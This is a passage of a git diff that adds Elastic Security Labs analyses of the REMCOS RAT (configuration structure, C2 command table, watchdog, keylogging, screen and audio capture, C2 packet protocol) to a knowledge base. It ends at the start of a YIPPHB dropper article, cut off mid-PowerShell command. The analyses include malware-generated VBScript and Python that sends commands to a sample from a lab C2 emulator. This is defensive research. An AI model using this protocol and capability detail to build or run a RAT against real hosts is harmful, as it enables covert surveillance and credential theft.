+In [previous](https://www.elastic.co/security-labs/dissecting-remcos-rat-part-one) [articles](https://www.elastic.co/security-labs/dissecting-remcos-rat-part-two) in this multipart series, malware researchers on the Elastic Security Labs team analyzed REMCOS execution flow, detailing its recording capabilities and its communication with  C2. In this article, you’ll learn more about REMCOS configuration structure and its C2 commands.
+
+## The configuration
+
+In this section, we provide a comprehensive overview of the configuration fields of the malware.
+
+### Configuration Table
+
+Researchers successfully recovered approximately 80% of the configuration structure (45 out of 56 fields). We provide detailed configuration information in the following table:
+
+
+| Index | Name | Description |
+| --- | --- | --- |
+| 0x0 | c2_list | String containing “domain:port:enable_tls“ separated by the “\x1e” character |
+| 0x1 | botnet | Name of the botnet |
+| 0x2 | connect_interval | Interval in second between connection attempt to C2 |
+| 0x3 | enable_install_flag | Install REMCOS on the machine host |
+| 0x4 | enable_hkcu_run_persistence_flag | Enable setup of the persistence in the registry |
+| 0x5 | enable_hklm_run_persistence_flag | Enable setup of the persistence in the registry |
+| 0x7 | keylogger_maximum_file_size | Maximum size of the keylogging data before rotation |
+| 0x8 | enable_hklm_policies_explorer_run_flag | Enable setup of the persistence in the registry |
+| 0x9 | install_parent_directory |  Parent directory of the install folder. Integer mapped to an hardcoded path |
+| 0xA | install_filename | Name of the REMCOS binary once installed |
+| 0xC | enable_persistence_directory_and_binary_hidding_flag | Enable super hiding the install directory and binary as well as setting them to read only |
+| 0xD | enable_process_injection_flag | Enable running the malware injected in another process |
+| 0xE | mutex | String used as the malware mutex and registry key |
+| 0xF | keylogger_mode | Set keylogging capability. Keylogging mode, 0 = disabled, 1 = keylogging everything, 2 = keylogging specific window(s) |
+| 0x10 | keylogger_parent_directory | Parent directory of the keylogging folder. Integer mapped to an hardcoded path |
+| 0x11 | keylogger_filename | Filename of the keylogged data |
+| 0x12 | enable_keylogger_file_encryption_flag | Enable encryption RC4 of the keylogger data file |
+| 0x13 | enable_keylogger_file_hidding_flag | Enable super hiding of the keylogger data file |
+| 0x14 | enable_screenshot_flag | Enable screen recording capability |
+| 0x15 | screenshot_interval_in_minutes | The time interval in minute for capturing each screenshot  |
+| 0x16 | enable_screenshot_specific_window_names_flag | Enable screen recording for specific window names |
+| 0x17 | screenshot_specific_window_names | String containing window names separated by the “;” character |
+| 0x18 | screenshot_specific_window_names_interval_in_seconds | The time interval in second for capturing each screenshot when a specific window name is found in the current foreground window title |
+| 0x19 | screenshot_parent_directory | Parent directory of the screenshot folder. Integer mapped to an hardcoded path |
+| 0x1A | screenshot_folder | Name of the screenshot folder |
+| 0x1B | enable_screenshot_encryption_flag | Enable encryption of screenshots |
+| 0x23 | enable_audio_recording_flag | Enable audio recording capability |
+| 0x24 | audio_recording_duration_in_minutes | Duration in second of each audio recording |
+| 0x25 | audio_record_parent_directory | Parent directory of the audio recording folder. Integer mapped to an hardcoded path |
+| 0x26 | audio_record_folder | Name of the audio recording folder |
+| 0x27 | disable_uac_flag | Disable UAC in the registry |
+| 0x28 | logging_mode | Set logging mode: 0 = disabled, 1 = minimized in tray, 2 = console logging |
+| 0x29 | connect_delay_in_second | Delay in second before the first connection attempt to the C2 |
+| 0x2A | keylogger_specific_window_names | String containing window names separated by the “;” character |
+| 0x2B | enable_browser_cleaning_on_startup_flag | Enable cleaning web browsers’ cookies and logins on REMCOS startup |
+| 0x2C | enable_browser_cleaning_only_for_the_first_run_flag | Enable web browsers cleaning only on the first run of Remcos |
+| 0x2D | browser_cleaning_sleep_time_in_minutes | Sleep time in minute before cleaning the web browsers |
+| 0x2E | enable_uac_bypass_flag | Enable UAC bypass capability |
+| 0x30 | install_directory | Name of the install directory |
+| 0x31 | keylogger_root_directory | Name of the keylogger directory |
+| 0x32 | enable_watchdog_flag | Enable watchdog capability |
+| 0x34 | license | License serial |
+| 0x35 | enable_screenshot_mouse_drawing_flag | Enable drawing the mouse on each screenshot |
+| 0x36 | tls_raw_certificate | Certificate in raw format used with tls enabled C2 communication |
+| 0x37 | tls_key | Key of the certificate |
+| 0x38 | tls_raw_peer_certificate | C2 public certificate in raw format |
+
+### Integer to path mapping
+
+REMCOS utilizes custom mapping for some of its "folder" fields instead of a string provided by the user.
+
+![](/assets/images/dissecting-remcos-rat-part-three/image70.png)
+
+We provide details of the mapping below:
+
+| Value | Path |
+| --- | --- |
+| 0 | %Temp% |
+| 1 | Current malware directory |
+| 2 | %SystemDrive% |
+| 3 | %WinDir% |
+| 4 | %WinDir%//SysWOW64|system32 |
+| 5 | %ProgramFiles% |
+| 6 | %AppData% |
+| 7 | %UserProfile% |
+| 8 | %ProgramData%|%ProgramFiles% |
+
+### Configuration extraction, an inside perspective
+
+We enjoy building tools, and we'd like to take this opportunity to provide some insight into the type of tools we develop to aid in our analysis of malware families like REMCOS.
+
+We developed a configuration extractor called "conf-tool", which not only extracts and unpacks the configuration from specific samples but can also repackage it with modifications.
+
+![```conf-tool``` help screen](/assets/images/dissecting-remcos-rat-part-three/image28.png)
+
+
+First, we unpack the configuration.
+
+![Unpacking the configuration](/assets/images/dissecting-remcos-rat-part-three/image35.png)
+
+
+The configuration is saved to the disk as a JSON document, with each field mapped to its corresponding type.
+
+![Dumped configuration in JSON format](/assets/images/dissecting-remcos-rat-part-three/image86.png)
+
+
+We are going to replace all the domains in the list with the IP address of our C2 emulator to initiate communication with the sample.
+
+![Setting our IP in the C2 list](/assets/images/dissecting-remcos-rat-part-three/image44.png)
+
+
+We are also enabling the logging mode to console (2):
+
+![Setting logging mode to console in the configuration](/assets/images/dissecting-remcos-rat-part-three/image37.png)
+
+
+Once we're done, repack everything:
+![Repacking the configuration in the REMCOS sample](/assets/images/dissecting-remcos-rat-part-three/image35.png)
+
+
+And voilà, we have the console, and the sample attempts to connect to our emulator!
+
+![REMCOS console](/assets/images/dissecting-remcos-rat-part-three/image65.png)
+
+
+We are releasing a [REMCOS malware configuration extractor](https://github.com/elastic/labs-releases/tree/main/extractors/remcos) that includes some of these features.
+
+## C2 commands
+
+In this section, we present a list of all the commands we've reversed that are executable by the Command and Control (C2). Furthermore, we provide additional details for a select subset of commands.
+
+### Command table
+
+Researchers recovered approximately 95% of the commands (74 out of 78). We provide information about the commands in the following table:
+
+| Function | Name |
+| --- | --- |
+| 0x1 | HeartBeat |
+| 0x2 | DisableKeepAlive |
+| 0x3 | ListInstalledApplications |
+| 0x6 | ListRunningProcesses |
+| 0x7 | TerminateProcess |
+| 0x8 | ListProcessesWindows |
+| 0x9 | CloseWindow |
+| 0xA | ShowWindowMaximized |
+| 0xB | ShowWindowRestore |
+| 0xC | TerminateProcessByWindowHandleAndListProcessesWindows |
+| 0xD | ExecuteShellCmd |
+| 0xE | StartPipedShell |
+| 0xF | ExecuteProgram |
+| 0x10 | MaybeUploadScreenshots |
+| 0x11 | GetHostGeolocation |
+| 0x12 | GetOfflineKeyloggerInformation |
+| 0x13 | StartOnlineKeylogger |
+| 0x14 | StopOnlineKeylogger |
+| 0x15 | MaybeSetKeyloggerNameAndUploadData |
+| 0x16 | UploadKeyloggerData |
+| 0x17 | DeleteKeyloggerDataThenUploadIfAnythingNewInbetween |
+| 0x18 | CleanBrowsersCookiesAndLogins |
+| 0x1B | StartWebcamModule |
+| 0x1C | StopWebcamModule |
+| 0x1D | EnableAudioCapture |
+| 0x1E | DisableAudioCapture |
+| 0x1F | StealPasswords |
+| 0x20 | DeleteFile |
+| 0x21 | TerminateSelfAndWatchdog |
+| 0x22 | Uninstall |
+| 0x23 | Restart |
+| 0x24 | UpdateFromURL |
+| 0x25 | UpdateFromC2 |
+| 0x26 | MessageBox |
+| 0x27 | ShutdownOrHibernateHost |
+| 0x28 | UploadClipboardData |
+| 0x29 | SetClipboardToSpecificData |
+| 0x2A | EmptyClipboardThenUploadIfAnythingInbetween |
+| 0x2B | LoadDllFromC2 |
+| 0x2C | LoadDllFromURL |
+| 0x2D | StartFunFuncModule |
+| 0x2F | EditRegistry |
+| 0x30 | StartChatModule |
+| 0x31 | SetBotnetName |
+| 0x32 | StartProxyModule |
+| 0x34 | ManageService |
+| 0x8F | SearchFile |
+| 0x92 | SetWallpaperFromC2 |
+| 0x94 | SetWindowTextThenListProcessesWindow |
+| 0x97 | UploadDataFromDXDiag |
+| 0x98 | FileManager |
+| 0x99 | ListUploadScreenshots |
+| 0x9A | DumpBrowserHistoryUsingNirsoft |
+| 0x9E | TriggerAlarmWav |
+| 0x9F | EnableAlarmOnC2Disconnect |
+| 0xA0 | DisableAlarmOnC2Disconnect |
+| 0xA2 | DownloadAlarmWavFromC2AndOptPlayIt |
+| 0xA3 | AudioPlayer |
+| 0xAB | ElevateProcess |
+| 0xAC | EnableLoggingConsole |
+| 0xAD | ShowWindow |
+| 0xAE | HideWindow |
+| 0xB2 | ShellExecuteOrInjectPEFromC2OrURL |
+| 0xC5 | RegistrySetHlightValue |
+| 0xC6 | UploadBrowsersCookiesAndPasswords |
+| 0xC8 | SuspendProcess |
+| 0xC9 | ResumeProcess |
+| 0xCA | ReadFile |
+| 0xCB | WriteFile |
+| 0xCC | StartOfflineKeylogger |
+| 0xCD | StopOfflineKeylogger |
+| 0xCE | ListProcessesTCPandUDPTables |
+
+### ListInstalledApplications command
+
+To list installed applications, REMCOS iterates over the ```Software\Microsoft\Windows\CurrentVersion\Uninstall``` registry key. For each subkey, it queries the following values:
+
+ - ```DisplayName```
+ - ```Publisher```
+ - ```DisplayVersion```
+ - ```InstallLocation```
+ - ```InstallDate```
+ - ```UninstallString```
+
+![```0x41C68F``` REMCOS listing installed applications](/assets/images/dissecting-remcos-rat-part-three/image61.png)
+
+
+### ExecuteShellCmd command
+Shell commands are executed using the ShellExecuteW API with ```cmd.exe /C {command}``` as arguments.
+
+![Executing a shell command using ```ShellExecuteW``` with ```cmd.exe```](/assets/images/dissecting-remcos-rat-part-three/image19.png)
+
+
+### GetHostGeolocation command
+To obtain host geolocation, REMCOS utilizes the [geoplugin.net](http://geoplugin.net) API and directly uploads the returned JSON data.
+
+![Requesting geolocation information from geoplugin.net](/assets/images/dissecting-remcos-rat-part-three/image91.png)
+
+
+### StartOnlineKeylogger command
+
+The online keylogger employs the same keylogger structure as the offline version. However, instead of writing the data to the disk, the data is sent live to the C2.
+
+![```0x40AEEE``` Initialization of the online keylogger](/assets/images/dissecting-remcos-rat-part-three/image23.png)
+
+
+### StartWebcamModule command
+
+REMCOS uses an external module for webcam recording. This module is a DLL that must be received and loaded from its C2 as part of the command parameters.
+
+![```0x404582``` REMCOS loading the webcam module from C2](/assets/images/dissecting-remcos-rat-part-three/image93.png)
+
+
+
+Once the module is loaded, you can send a sub-command to capture and upload a webcam picture.
+
+![```0x4044F5``` Sub-command handler for capturing and uploading pictures](/assets/images/dissecting-remcos-rat-part-three/image52.png)
+
+
+### StealPasswords command
+
+Password stealing is likely carried out using 3 different [Nirsoft](https://www.nirsoft.net/) binaries, identified by the "/sext" parameters. These binaries are received from the C2 and injected into a freshly created process. Both elements are part of the command parameters.
+
+![```0x412BAA``` REMCOS injects one of the Nirsoft binary into a freshly created process](/assets/images/dissecting-remcos-rat-part-three/image72.png)
+
+
+The ```/sext``` parameter instructs the software to write the output to a file, each output filename is randomly generated and stored in the malware installation folder. Once their contents are read and uploaded to the C2, they are deleted.
+
+![```0x412B12``` Building random filename for the Nirsoft output file](/assets/images/dissecting-remcos-rat-part-three/image87.png)
+
+
+![Read and delete the output file](/assets/images/dissecting-remcos-rat-part-three/image98.png)
+
+
+An additional DLL, with a [FoxMailRecovery](https://github.com/jacobsoo/FoxmailRecovery) export, can also be utilized. Like the other binaries, the DLL is received from the C2 as part of the command parameters. As the name implies the DLLis likely to be used to dump FoxMail data
+
+![Loading additional dll with FoxMailRecovery export](/assets/images/dissecting-remcos-rat-part-three/image17.png)
+
+
+### Uninstall command
+
+The uninstall command will delete all Remcos-related files and persistence registry keys from the host machine.
+
+First, it kills the watchdog process.
+![```0x040D0A0``` Killing the watchdog process](/assets/images/dissecting-remcos-rat-part-three/image38.png)
+
+
+Then, it deletes all the recording files (keylogging, screenshots, and audio recordings).
+
+![```0x40D0A5``` Deleting * recording files](/assets/images/dissecting-remcos-rat-part-three/image88.png)
+
+
+Then, it deletes its registry persistence keys.
+
+![```0x40D0EC``` Deleting * persistence keys](/assets/images/dissecting-remcos-rat-part-three/image47.png)
+
+
+Finally, it deletes its installation files by creating and executing a Visual Basic script in the %TEMP% folder with a random filename, then terminates its process.
+
+![```0x40D412``` Executing the delete visual basic script and exit](/assets/images/dissecting-remcos-rat-part-three/image75.png)
+
+
+Below the generated script with comments.
+
+```
+' Continue execution even if an error occurs
+On Error Resume Next
+
+' Create a FileSystemObject
+Set fso = CreateObject("Scripting.FileSystemObject")
+
+' Loop while the specified file exists
+while fso.FileExists("C:\Users\Cyril\Desktop\corpus\0af76f2897158bf752b5ee258053215a6de198e8910458c02282c2d4d284add5.exe")
+
+' Delete the specified file
+fso.DeleteFile "C:\Users\Cyril\Desktop\corpus\0af76f2897158bf752b5ee258053215a6de198e8910458c02282c2d4d284add5.exe"
+
+' End of the loop
+wend
+
+' Delete the script itself
+fso.DeleteFile(Wscript.ScriptFullName)
+```
+
+### Restart command
+
+The Restart command kills the watchdog process and restarts the REMCOS binary using a generated Visual Basic script.
+
+Below is the generated script with comments.
+
+```
+' Create a WScript.Shell object and run a command in the command prompt
+' The command runs the specified .exe file
+' The "0" argument means the command prompt window will not be displayed
+CreateObject("WScript.Shell").Run "cmd /c ""C:\Users\Cyril\Desktop\corpus\0af76f2897158bf752b5ee258053215a6de198e8910458c02282c2d4d284add5.exe""", 0
+
+' Create a FileSystemObject and delete the script itself
+CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
+```
+
+## DumpBrowserHistoryUsingNirsoft command
+
+Like the StealPasswords command, the DumpBrowserHistoryUsingNirsoft command steals browser history using likely another Nirsoft binary received from the C2 as part of the command parameter. Again, we identify the binary as part of Nirsoft because of the ```/stext``` parameter.
+
+![```0x40404C``` Dumping browsers history using likely Nirsoft binary](/assets/images/dissecting-remcos-rat-part-three/image46.png)
+
+
+### ElevateProcess command
+
+The ElevateProcess command, if the process isn’t already running with administrator privileges, will set the ```HKCU/SOFTWARE/{mutex}/elev``` registry key and restart the malware using the same method as the Restart command.
+
+![```0x416EF6``` Set the ```elev``` registry key and restart](/assets/images/dissecting-remcos-rat-part-three/image26.png)
+
+
+Upon restart, the REMCOS checks the ```elev``` value as part of its initialization phase. If the value exists, it'll delete it and utilize its UAC bypass feature to elevate its privileges.
+
+![```0x40EC39``` Forced UAC bypass if the ```elev``` key exists in the registry](/assets/images/dissecting-remcos-rat-part-three/image95.png)
+
+
+That’s the end of the third article. In the final part we’ll cover detection and hunt strategies of REMCOS using Elastic technologies.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/dissecting_remcos_rat_part_two.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/dissecting_remcos_rat_part_two.md
new file mode 100644
index 0000000000000..648e7504aef37
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/dissecting_remcos_rat_part_two.md
@@ -0,0 +1,237 @@
+---
+title: "Dissecting REMCOS RAT: An in-depth analysis of a widespread 2024 malware, Part Two"
+slug: "dissecting-remcos-rat-part-two"
+date: "2024-04-30"
+subtitle: "Part two: Diving into REMCOS recording capabilities, launch, and C2 communication"
+description: "In the previous article in this series on the REMCOS implant, we shared information about execution, persistence, and defense evasion mechanisms. Continuing this series we’ll cover the second half of its execution flow and you’ll learn more about REMCOS recording capabilities and communication with its C2."
+author:
+  - slug: cyril-francois
+  - slug: samir-bousseaden
+image: "Security Labs Images 21.jpg"
+category:
+  - slug: malware-analysis
+tags:
+  - malware-analysis
+  - remcos
+---
+
+In the [previous article](https://www.elastic.co/security-labs/dissecting-remcos-rat-part-one) in this series on the REMCOS implant, we shared information about execution, persistence, and defense evasion mechanisms. Continuing this series we’ll cover the second half of its execution flow and you’ll learn more about REMCOS recording capabilities and communication with its C2.
+
+## Starting watchdog
+
+If the ```enable_watchdog_flag``` (index ```0x32```) is enabled, the REMCOS will activate its watchdog feature.
+
+![0x40F24F Starting watchdog feature if enabled in the configuration](/assets/images/dissecting-remcos-rat-part-two/image68.png)
+
+
+This feature involves the malware launching a new process, injecting itself into it, and monitoring the main process. The goal of the watchdog is to restart the main process in case it gets terminated. The main process can also restart the watchdog if it gets terminated.
+
+
+![Console message indicating activation of watchdog module](/assets/images/dissecting-remcos-rat-part-two/image49.png)
+
+
+The target binary for watchdog injection is selected from a hardcoded list, choosing the first binary for which the process creation and injection are successful:
+
+ - ```svchost.exe```
+ - ```rmclient.exe```
+ - ```fsutil.exe```
+
+![0x4122C5 Watchdog target process selection](/assets/images/dissecting-remcos-rat-part-two/image32.png)
+
+
+In this example, the watchdog process is ```svchost.exe```.
+
+![svchost.exe watchdog process](/assets/images/dissecting-remcos-rat-part-two/image3.png)
+
+
+The registry value ```HKCU/SOFTWARE/{MUTEX}/WD``` is created before starting the watchdog process and contains the main process PID.
+
+![The main process PID is saved in the WD registry key](/assets/images/dissecting-remcos-rat-part-two/image31.png)
+
+
+Once REMCOS is running in the watchdog process, it takes a "special" execution path by verifying if the ```WD``` value exists in the malware registry key. If it does, the value is deleted, and the monitoring procedure function is invoked.
+ 
+![0x40EB54 Watchdog execution path when WD registry value exists](/assets/images/dissecting-remcos-rat-part-two/image63.png)
+
+It is worth noting that the watchdog process has a special mutex to differentiate it from the main process mutex. This mutex string is derived from the configuration (index ```0xE```) and appended with ```-W```.
+
+![Mutex field in the configuration](/assets/images/dissecting-remcos-rat-part-two/image92.png)
+
+
+![Comparison between main process and watchdog process mutexes](/assets/images/dissecting-remcos-rat-part-two/image64.png)
+
+
+When the main process is terminated, the watchdog detects it and restarts it using the ```ShellExecuteW``` API with the path to the malware binary retrieved from the ```HKCU/SOFTWARE/{mutex}/exepath``` registry key
+
+![Console message indicating process restart by watchdog](/assets/images/dissecting-remcos-rat-part-two/image30.png)
+
+
+## Starting recording threads
+
+### Keylogging thread
+
+The offline keylogger has two modes of operation:
+
+ 1. Keylog everything
+ 2. Enable keylogging when specific windows are in the foreground
+
+When the ```keylogger_mode``` (index ```0xF```) field is set to 1 or 2 in the configuration, REMCOS activates its "Offline Keylogger" capability.
+
+![](/assets/images/dissecting-remcos-rat-part-two/image62.png)
+
+
+Keylogging is accomplished using the ```SetWindowsHookExA``` API with the ```WH_KEYBOARD_LL``` constant.
+
+![0x40A2B8 REMCOS setting up keyboard event hook using SetWindowsHookExA](/assets/images/dissecting-remcos-rat-part-two/image23.png)
+
+
+The file where the keylogging data is stored is built using the following configuration fields:
+
+ - ```keylogger_root_directory``` (index ```0x31```)
+ - ```keylogger_parent_directory``` (index ```0x10```)
+ - ```keylogger_filename``` (index ```0x11```)
+
+The keylogger file path is ```{keylogger_root_directory}/{keylogger_parent_directory}/{keylogger_filename}```. In this case, it will be ```%APPDATA%/keylogger.dat```.
+
+![Keylogging data file keylogger.dat](/assets/images/dissecting-remcos-rat-part-two/image8.png)
+
+
+![Keylogging data content](/assets/images/dissecting-remcos-rat-part-two/image94.png)
+
+
+The keylogger file can be encrypted by enabling the ```enable_keylogger_file_encryption_flag``` (index ```0x12```) flag in the configuration. It will be encrypted using the RC4 algorithm and the configuration key.
+
+![0x40A7FC Decrypting, appending, and re-encrypting the keylogging data file](/assets/images/dissecting-remcos-rat-part-two/image51.png)
+
+
+The file can also be made super hidden by enabling the ```enable_keylogger_file_hiding_flag``` (index ```0x13```) flag in the configuration.
+
+When using the second keylogging mode, you need to set the ```keylogger_specific_window_names``` (index ```0x2A```) field with strings that will be searched in the current foreground window title every 5 seconds.
+
+![0x40A109 Keylogging mode choice](/assets/images/dissecting-remcos-rat-part-two/image84.png)
+
+
+Upon a match, keylogging begins. Subsequently, the current foreground window is checked every second to stop the keylogger if the title no longer contains the specified strings.
+
+![Monitoring foreground window for keylogging activation](/assets/images/dissecting-remcos-rat-part-two/image79.png)
+
+
+### Screen recording threads
+
+When the ```enable_screenshot_flag``` (index ```0x14```) is enabled in the configuration, REMCOS will activate its screen recording capability.
+
+![0x40F0B3 Starting screen recording capability when enabled in configuration](/assets/images/dissecting-remcos-rat-part-two/image81.png)
+
+
+To take a screenshot, REMCOS utilizes the ```CreateCompatibleBitmap``` and the ```BitBlt``` Windows APIs. If the ```enable_screenshot_mouse_drawing_flag``` (index ```0x35```) flag is enabled, the mouse is also drawn on the bitmap using the ```GetCursorInfo```, ```GetIconInfo```, and the ```DrawIcon``` API.
+
+![0x418E76 Taking screenshot 1/2](/assets/images/dissecting-remcos-rat-part-two/image6.png)
+
+
+![0x418E76 Taking screenshot 2/2](/assets/images/dissecting-remcos-rat-part-two/image82.png)
+
+
+The path to the folder where the screenshots are stored is constructed using the following configuration:
+ - ```screenshot_parent_directory``` (index ```0x19```)
+ - ```screenshot_folder``` (index ```0x1A```)
+
+The final path is ```{screenshot_parent_directory}/{screenshot_folder}```.
+
+REMCOS utilizes the ```screenshot_interval_in_minutes``` (index ```0x15```) field to capture a screenshot every X minutes and save it to disk using the following format string: ```time_%04i%02i%02i_%02i%02i%02i```.
+
+![Location where screenshots are saved](/assets/images/dissecting-remcos-rat-part-two/image45.png)
+
+
+Similarly to keylogging data, when the ```enable_screenshot_encryption_flag``` (index ```0x1B```) is enabled, the screenshots are saved encrypted using the RC4 encryption algorithm and the configuration key.
+
+At the top, REMCOS has a similar "specific window" feature for its screen recording as its keylogging capability. When the ```enable_screenshot_specific_window_names_flag``` (index ```0x16```) is set, a second screen recording thread is initiated.
+
+![0x40F108 Starting specific window screen recording capability when enabled in configuration](/assets/images/dissecting-remcos-rat-part-two/image20.png)
+
+
+
+This time, it utilizes the ```screenshot_specific_window_names``` (index ```0x17```) list of strings to capture a screenshot when the foreground window title contains one of the specified strings. Screenshots are taken every X seconds, as specified by the ```screenshot_specific_window_names_interval_in_seconds``` (index ```0x18```) field.
+
+In this case, the screenshots are saved on the disk using a different format string: ```wnd_%04i%02i%02i_%02i%02i%02i```. Below is an example using ["notepad"] as the list of specific window names and setting the Notepad process window in the foreground.
+
+![Screenshot triggered when Notepad window is in the foreground](/assets/images/dissecting-remcos-rat-part-two/image89.png)
+
+
+### Audio recording thread
+
+When the ```enable_audio_recording_flag``` (index ```0x23```) is enabled, REMCOS initiates its audio recording capability.
+
+![0x40F159 Starting audio recording capability when enabled in configuration](/assets/images/dissecting-remcos-rat-part-two/image24.png)
+
+
+The recording is conducted using the Windows ```Wave*``` API. The duration of the recording is specified in minutes by the ```audio_recording_duration_in_minutes``` (```0x24```) configuration field.
+
+![0x401BE9 Initialization of audio recording](/assets/images/dissecting-remcos-rat-part-two/image2.png)
+
+
+After recording for X minutes, the recording file is saved, and a new recording begins. REMCOS uses the following configuration fields to construct the recording folder path:
+
+ - ```audio_record_parent_directory``` (index ```0x25```)
+ - ```audio_record_folder``` (index ```0x26```)
+
+The final path is ```{audio_record_parent_directory}/{audio_record_folder}```. In this case, it will be ```C:\MicRecords```. Recordings are saved to disk using the following format: ```%Y-%m-%d %H.%M.wav```.
+
+![Audio recording folder](/assets/images/dissecting-remcos-rat-part-two/image33.png)
+
+
+## Communication with the C2
+
+After initialization, REMCOS initiates communication with its C2. It attempts to connect to each domain in its ```c2_list``` (index ```0x0```) until one responds.
+
+According to previous research, communication can be encrypted using TLS if enabled for a specific C2. In such cases, the TLS engine will utilize the ```tls_raw_certificate``` (index ```0x36```), ```tls_key``` (index ```0x37```), and ```tls_raw_peer_certificate``` (index ```0x38```) configuration fields to establish the TLS tunnel.
+
+It's important to note that in this scenario, only one peer certificate can be provided for multiple TLS-enabled C2 domains. As a result, it may be possible to identify other C2s using the same certificate.
+
+Once connected we received our first packet:
+
+![Hello packet from REMCOS](/assets/images/dissecting-remcos-rat-part-two/image80.png)
+
+
+As [described in depth by Fortinet](https://www.fortinet.com/blog/threat-research/latest-remcos-rat-phishing), the protocol hasn't changed, and all packets follow the same structure:
+
+ - (orange)```magic_number```:  ```\x24\x04\xff\x00```
+ - (red)```data_size```: ```\x40\x03\x00\x00```
+ - (green)```command_id``` (number): ```\0x4b\x00\x00\x00```
+ - (blue)data fields separated by ```|\x1e\x1e\1f|```
+
+After receiving the first packet from the malware, we can send our own command using the following functions.
+
+```Python
+MAGIC = 0xFF0424
+SEPARATOR = b"\x1e\x1e\x1f|"
+
+
+def build_command_packet(command_id: int, command_data: bytes) -> bytes:
+	return build_packet(command_id.to_bytes(4, byteorder="little") + command_data)
+
+
+def build_packet(data: bytes) -> bytes:
+	packet = MAGIC.to_bytes(4, byteorder="little")
+	packet += len(data).to_bytes(4, byteorder="little")
+	packet += data
+	return packet
+```
+
+Here we are going to change the title of a Notepad window using the command 0x94, passing as parameters its window handle (329064) and the text of our choice.
+
+```Python
+def main() -> None:
+	server_0 = nclib.TCPServer(("192.168.204.1", 8080))
+
+	for client in server_0:
+    	print(client.recv_all(5))
+
+    	client.send(build_command_packet(
+            			0x94,
+            			b"329064" + SEPARATOR + "AM_I_A_JOKE_TO_YOU?".encode("utf-16-le")))
+```
+
+![REMCOS executed the command, changing the Notepad window text](/assets/images/dissecting-remcos-rat-part-two/image1.png)
+
+
+That’s the end of the second article. The third part will cover REMCOS' configuration and its C2 commands.
\ No newline at end of file
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/doing_time_with_the_yipphb_dropper.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/doing_time_with_the_yipphb_dropper.md
new file mode 100644
index 0000000000000..6eb7d16a0a941
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/doing_time_with_the_yipphb_dropper.md
@@ -0,0 +1,520 @@
+---
+title: "Doing time with the YIPPHB dropper"
+slug: "doing-time-with-the-yipphb-dropper"
+date: "2022-11-21"
+subtitle: "Elastic Security Labs identified an interesting approach to frustrate the detection of the YIPPHB dropper and RAT implants."
+description: "Elastic Security Labs outlines the steps collect and analyze the various stages of the REF4526 intrusion set. This intrusion set uses a creative approach of Unicode icons in Powershell scripts to install a loader, a dropper, and RAT implants."
+author:
+  - slug: seth-goodwin
+  - slug: derek-ditch
+  - slug: salim-bitam
+  - slug: remco-sprooten
+  - slug: andrew-pease
+image: "time-watch-theme-machines-gears.jpg"
+category:
+  - slug: attack-pattern
+tags:
+  - ref4526
+  - njrat
+  - yipphb
+---
+
+## Key takeaways
+
+- Elastic Security Labs identified 12 clusters of activity using a similar TTP of threading Base64 encoded strings with Unicode icons to load the YIPPHB dropper.
+- YIPPHB is an unsophisticated, but effective, dropper used to deliver RAT implants going back at least May of 2022.
+- The initial access attempts to use Unicode icons embedded in Powershell to delay automated analysis.
+
+## Preamble
+
+While reviewing telemetry data, Elastic Security Labs identified abnormal arguments during the execution of Powershell. A closer examination identified the use of Unicode icons within Base64-encoded strings. A substitution mechanism was used to replace the icons with ASCII characters.
+
+Once the icons were replaced with ASCII characters, a repetitive process of collecting Base64 encoded files and reversed URLs was used to execute a dropper and a full-featured malware implant. The dropper and malware implant was later identified as YIPPHB and NJRAT, respectively.
+
+This research focused on the following:
+
+- Loader phase
+- Dropper phase
+- RAT phase
+- Activity clusters
+- Network infrastructure
+- Hunting queries
+
+## Analysis
+
+The analysis of this intrusion set describes an obfuscation method we believe is intended to evade automated analysis of PowerShell commands, and which we characterize as rudimentary and prescriptive.
+
+![Execution flow for the REF4526 intrusion set](/assets/images/doing-time-with-the-yipphb-dropper/image3.png)
+
+### Loader phase
+
+While analyzing Powershell commands in Elastic’s telemetry, we observed Unicode icons embedded into Powershell commands. The use of Unicode to obfuscate Powershell commands is not a technique we have observed.
+
+```
+"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 